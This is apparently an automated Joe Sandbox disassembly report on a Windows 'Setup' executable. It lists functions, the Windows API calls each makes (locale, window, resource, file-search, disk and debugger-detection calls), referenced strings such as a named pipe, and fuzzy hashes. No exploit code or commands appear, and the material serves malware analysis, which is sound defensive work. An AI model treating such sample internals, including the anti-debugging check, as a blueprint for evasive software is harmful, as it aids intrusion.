Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: &_'
API String ID: 3541575487-2411122644
Opcode ID: 9154d9cd69d8c8e0e959a57cd49407fc033cb7ea361622d3f986cb3952f156d4
Instruction ID: 086bb858bbab58abdca445def42f1fe11f45f46eb7ede324eb62f089c496422e
Opcode Fuzzy Hash: 9154d9cd69d8c8e0e959a57cd49407fc033cb7ea361622d3f986cb3952f156d4
Instruction Fuzzy Hash: 24618971A012689FCF24DB65C889BEEBBB8FF45310F148199E44AA7291EB705E84CF51

Function 008726D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

GetLocaleInfoW.KERNEL32(00000000,00000002,009D3180,00000000), ref: 00872751
GetLocaleInfoW.KERNEL32(00000000,00000002,?,-00000001,00000078,-00000001), ref: 0087278D

Strings

%d-%s, xrefs: 00872797
&_', xrefs: 008726E7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale$HeapProcess
String ID: %d-%s$&_'
API String ID: 3246605784-1322657082
Opcode ID: 104b3448cec1048d48da6120da135115f3c6dbea81e14e1d51c4b9f224a0a541
Instruction ID: e721c21eccf8159c984e169e511c951b8c35c41e8eb0e6e024ff7e582aff7ee0
Opcode Fuzzy Hash: 104b3448cec1048d48da6120da135115f3c6dbea81e14e1d51c4b9f224a0a541
Instruction Fuzzy Hash: 38319872A08209ABDB04DF98CC4ABAEBBB5FF44724F10415DE525A7281DB75AA01CB90

Function 00702A40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000004), ref: 00702A9B
GetWindowLongW.USER32(00000004,000000FC), ref: 00702AB4
SetWindowLongW.USER32(00000004,000000FC,?), ref: 00702AC6

Strings

&_', xrefs: 00702A55

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Long
String ID: &_'
API String ID: 847901565-2411122644
Opcode ID: a983f12980cfe7761b96d14c5688c54020f638f456a45b55021fab82ef71932d
Instruction ID: 47837bdb5eb680c07ccd5354e534c2a0b3197fd76ae6290d76736ac55d9c7ad0
Opcode Fuzzy Hash: a983f12980cfe7761b96d14c5688c54020f638f456a45b55021fab82ef71932d
Instruction Fuzzy Hash: 24418BB1B00656EFDB10CF69D848B5AFBE4FB04314F008269E9159BAD1DB7AE914CB90

Function 0070AF60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000003,000000FC), ref: 0070AFB6
SetWindowLongW.USER32(00000003,000000FC,?), ref: 0070AFC8
DeleteCriticalSection.KERNEL32(?,275F26E1,?,?,?,?,00942DA4,000000FF), ref: 0070AFF3

Strings

&_', xrefs: 0070AF74

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: LongWindow$CriticalDeleteSection
String ID: &_'
API String ID: 1978754570-2411122644
Opcode ID: f133ce2449255da71ab0e6569ded5e7e1792e907052ea1c0337b2766bb4d2edc
Instruction ID: 8cb934e631dcc224ef5902e84bc1c15ee98bbec80a556458fde5ee9740b93683
Opcode Fuzzy Hash: f133ce2449255da71ab0e6569ded5e7e1792e907052ea1c0337b2766bb4d2edc
Instruction Fuzzy Hash: 8131BCB0A04706FBCB20CF68CC04B8ABBE8BF05310F108359E824A76D1D775EA55CB90

Function 00916863 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0091695B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00916965
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00916972

Strings

&_', xrefs: 0091686E

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: &_'
API String ID: 3906539128-2411122644
Opcode ID: f2b7fac89596b9c360d4d9e579357ac0edf506eddff635283c99f31245576714
Instruction ID: cc011af3cd52b8f569d30469e3581f8375e788d1449db5ac818759539565f05f
Opcode Fuzzy Hash: f2b7fac89596b9c360d4d9e579357ac0edf506eddff635283c99f31245576714
Instruction Fuzzy Hash: 2F319375A1122CABCB21DF68DC897DDBBB8BF58310F5041EAE51CA7250E7709B858F44

Function 006EA660 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,275F26E1,00000001,00000000,?,00000000,0093C410,000000FF,?,006EA60C,00000000,?,?,\\.\pipe\ToServer,0093CAE0), ref: 006EA68B
LockResource.KERNEL32(00000000,?,006EA60C,00000000,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0,00000000,?,?,0088A498,\\.\pipe\ToServer), ref: 006EA696
SizeofResource.KERNEL32(00000000,00000000,?,006EA60C,00000000,?,?,\\.\pipe\ToServer,0093CAE0,000000FF,?,006EA7B0,00000000,?,?,0088A498), ref: 006EA6A4

Strings

&_', xrefs: 006EA674

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID: &_'
API String ID: 2853612939-2411122644
Opcode ID: c7b37b4a2ba935dbe2291f0c07805ebaa079af3551c001c18a4d7555d0323671
Instruction ID: 5dc3f30ffeb35a422681be40f03e2a49c601daa255542b16dd105ca4e91aa213
Opcode Fuzzy Hash: c7b37b4a2ba935dbe2291f0c07805ebaa079af3551c001c18a4d7555d0323671
Instruction Fuzzy Hash: 9411EB33A147549BC7208F99DC45B66F7E8EB89714F04493AED16D7350E635AC0086D0

Function 0070CF90 Relevance: 7.0, Strings: 5, Instructions: 705COMMON

Download Yara Rule

Strings

AI_CONTROL_VISUAL_STYLE, xrefs: 0070CFEA
AI_NO_BORDER_NORMAL, xrefs: 0070D086
AI_NO_BORDER_HOVER, xrefs: 0070D13C
AI_CONTROL_VISUAL_STYLE_EX, xrefs: 0070D455
&_', xrefs: 0070CFBB

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL$&_'
API String ID: 0-1949985146
Opcode ID: 37930a2ca9704f131ae7e8d5e095f0df6715d12b2a4ab5ab2405be92d00dbce0
Instruction ID: 813e307221e4e4bb678e960227f0036691b39ecec741971ac025ee6a2bd4a6c7
Opcode Fuzzy Hash: 37930a2ca9704f131ae7e8d5e095f0df6715d12b2a4ab5ab2405be92d00dbce0
Instruction Fuzzy Hash: 1C42C171D00228CBDB28DFA8CC54BAEB7F1AF95304F148259E455AB3C2D778AD45CBA1

Function 00720430 Relevance: 6.6, Strings: 5, Instructions: 378COMMON

Download Yara Rule

Strings

= ", xrefs: 00720768
Show, xrefs: 00720730
Hide, xrefs: 007204F4, 00720515
&_', xrefs: 00720447
<> ", xrefs: 00720551

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: <> "$ = "$Hide$Show$&_'
API String ID: 0-2581291636
Opcode ID: b59d42d50c839ce05e07eb300f39917fad04ae3460b2e497379548069eca7d74
Instruction ID: 4217e6ead36c2aa9a853b64c78d968f6ad0c19185cf12c11746f76fc0c5eb9cf
Opcode Fuzzy Hash: b59d42d50c839ce05e07eb300f39917fad04ae3460b2e497379548069eca7d74
Instruction Fuzzy Hash: 0E026C70D002A9CFDB14DF64C855BADB7B1AF55304F1086DAE40AB7292EB746E84CFA0

Function 00724860 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 294COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,0000005C,?), ref: 0072499C
GetDiskFreeSpaceExW.KERNEL32(?,?,?,00000000,0000005C,?), ref: 00724A6C

Strings

&_', xrefs: 00724877, 00724BA4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DiskDriveFreeSpaceType
String ID: &_'
API String ID: 1419299958-2411122644
Opcode ID: 73e1909b6654cfc3633a6bc13a44ca6adeb94400677f99d8a66fceae7e68e8eb
Instruction ID: 11d638adbd4e73bb588f8a15d0d4b9fe77a9b5326d388461897fe82b804cd1e9
Opcode Fuzzy Hash: 73e1909b6654cfc3633a6bc13a44ca6adeb94400677f99d8a66fceae7e68e8eb
Instruction Fuzzy Hash: E5B1B771D00258DFCB10DFA8C845BEEBBB1FF59314F20825DE856A7281DB746A84CB91

Function 0086A320 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000003,275F26E1,00000000,?,00000010), ref: 0086A414
FindClose.KERNEL32(00000000,?,00000010), ref: 0086A45F

Strings

&_', xrefs: 0086A33F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: &_'
API String ID: 2295610775-2411122644
Opcode ID: e93efbcc37b7026fede6f61d95b1086b31d8c7f8714a0ef1edfcd4f44e118279
Instruction ID: 79a9fb847b6f2d36587d6428502f55758c357c4d0c180f00b5e40a08f8227afc
Opcode Fuzzy Hash: e93efbcc37b7026fede6f61d95b1086b31d8c7f8714a0ef1edfcd4f44e118279
Instruction Fuzzy Hash: EB51BE71A00249CFDB15DFA8C8487AEB7B0FF44314F114159E816AB381DB74AA05CF92

Function 00848020 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,275F26E1,?,00000000), ref: 0084806B
GetLastError.KERNEL32(?,00000000), ref: 00848075

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Strings

&_', xrefs: 00848037

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AllocateErrorFormatHeapLastMessage
String ID: &_'
API String ID: 4114510652-2411122644
Opcode ID: f8e8eddea525f8e5a7c742d927c0d3644d5ca921919384e118a7ac5b1c489665
Instruction ID: 1324ef02eb423a949c7af59244bcc4acc8bd0ae7384f5258996ad0e5f42f104f
Opcode Fuzzy Hash: f8e8eddea525f8e5a7c742d927c0d3644d5ca921919384e118a7ac5b1c489665
Instruction Fuzzy Hash: 6141AC71A04209DFEB10DF99DC467AEBBB5FF44714F14016EE915E7380DBB599048B90

Function 0083E370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00A68388), ref: 0083E3CF

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Strings

&_', xrefs: 0083E398
%04d-%02d-%02d %02d-%02d-%02d, xrefs: 0083E41D

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: HeapLocalProcessTime
String ID: %04d-%02d-%02d %02d-%02d-%02d$&_'
API String ID: 1554148984-2975620970
Opcode ID: 4f424da4ede0a1cc985057b025219541422dc82098bf17f83f5969f563e718eb
Instruction ID: 1379c4f72e8920b92ce97b907fe8931b453b1edc6445c4112be11b11475e15ff
Opcode Fuzzy Hash: 4f424da4ede0a1cc985057b025219541422dc82098bf17f83f5969f563e718eb
Instruction Fuzzy Hash: C8215CB1D14208AFDB14DF9AD841BAEFBF8EF48710F10411AF911A7280EB746940CBA5

Function 00923290 Relevance: 5.0, APIs: 3, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21855bdb8ba807f58c1ec4435e74bb4c12fa2aaadc0b4228471a3867db684844
Instruction ID: fd3b616c0a6b7e7d775ee16d884c69ebc1f5e2a14fc603089aff4fc45bd91e5c
Opcode Fuzzy Hash: 21855bdb8ba807f58c1ec4435e74bb4c12fa2aaadc0b4228471a3867db684844
Instruction Fuzzy Hash: E6026171E002299FDF14DFA8D880AADFBB5FF88314F248269E915A7344D734AA45CF90

Function 006FA9C0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(0000001B,000000FC), ref: 006FA9D9
SetWindowLongW.USER32(0000001B,000000FC,?), ref: 006FA9E7
DestroyWindow.USER32(0000001B,?,?,?,?,?,?,?,?,?,?,?,?,80004003,?,00000000), ref: 006FAA13

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Long$Destroy
String ID:
API String ID: 3055081903-0
Opcode ID: 16613f464e5279369aa5a1ff6c2a777992a53c3bc614e0c0fcec945f5dca39cd
Instruction ID: c6988641a19f16857c2b8fe7df2c3c33a705cd71de4bedd6d81cbbfc4f7eb044
Opcode Fuzzy Hash: 16613f464e5279369aa5a1ff6c2a777992a53c3bc614e0c0fcec945f5dca39cd
Instruction Fuzzy Hash: 0FF09030104B10ABCB709BA8ED04BA2BBE1BF04725F048B58F4AE969E0C730E895CB00

Function 007787D0 Relevance: 4.3, Strings: 3, Instructions: 521COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 007789B5, 00778B9F
#~, xrefs: 00778984
&_', xrefs: 007787E7, 007789D7, 00778BC7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: #~$unordered_map/set too long$&_'
API String ID: 0-1318458245
Opcode ID: efdfc74aa527c81b59b347681b280af203e7b272f117bb669abd35f11e1aae65
Instruction ID: dc1d98a7528fd01597cae50d207f8c35fd8ad5003f1790eb89174b18e6a04960
Opcode Fuzzy Hash: efdfc74aa527c81b59b347681b280af203e7b272f117bb669abd35f11e1aae65
Instruction Fuzzy Hash: 0C12D3B1A002099FCB14DF68C885AADB7F5FF58350F14C26AE819EB391DB34A941CB91

Function 00934CF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00934D40

Strings

&_', xrefs: 00934CFB

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID: &_'
API String ID: 2299586839-2411122644
Opcode ID: c5f03e746cb5e089fd6af0c0a81fa314e80c03e604afef81192d1db1da4b88cd
Instruction ID: ab355acfa34a85ab77b4584d4b8052960fcf88d3df83dcf7a60cf068ae63d591
Opcode Fuzzy Hash: c5f03e746cb5e089fd6af0c0a81fa314e80c03e604afef81192d1db1da4b88cd
Instruction Fuzzy Hash: 94218E72614216ABEF24DA24EC46BBA73ACEF85314F11007AED11DA191EB74FD418A51

Function 00934870 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00001002,?,00000078,-00000050,00000000,000000D0), ref: 009348C0

Strings

utf8, xrefs: 00934826
&_', xrefs: 0093487B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID: utf8$&_'
